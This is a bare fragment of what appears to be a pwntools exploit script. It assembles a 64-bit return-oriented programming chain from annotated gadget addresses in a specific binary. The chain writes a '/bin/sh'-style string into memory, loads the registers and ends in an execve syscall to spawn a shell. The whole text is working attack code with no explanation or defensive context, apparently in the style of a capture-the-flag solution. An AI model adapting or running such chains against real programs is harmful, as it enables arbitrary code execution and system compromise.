payload = p64(0x40b4f7)
#0x000000000040b4f7: pop rax; ret 0; 
payload += p64(0x80)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x41b200)+p64(0x0)+p64(0x407e2c)
# 0x0000000000407e2c: add dword ptr [rsi], eax; mov ah, 1; ret; 
payload += p64(0x40b4f7)
# 0x000000000040b4f7: pop rax; ret 0; 
payload += p64(0x6e69622f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x41b070)+p64(0x0)+p64(0x407e2c)
# 0x0000000000407e2c: add dword ptr [rsi], eax; mov ah, 1; ret; 
payload += p64(0x40b4f7)
# 0x000000000040b4f7: pop rax; ret 0; 
payload += p64(0x68662f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x41b074)+p64(0x0)+p64(0x407e2c)
# 0x0000000000407e2c: add dword ptr [rsi], eax; mov ah, 1; ret; 
payload += p64(0x40b4f7)
# 0x000000000040b4f7: pop rax; ret 0; 
payload += p64(0x36b1b015)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x41b070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40b4f7)
# 0x000000000040b4f7: pop rax; ret 0; 
payload += p64(0x3b)+p64(0x40c4d0)
# 0x000000000040c4d0: syscall; 
payload += b''
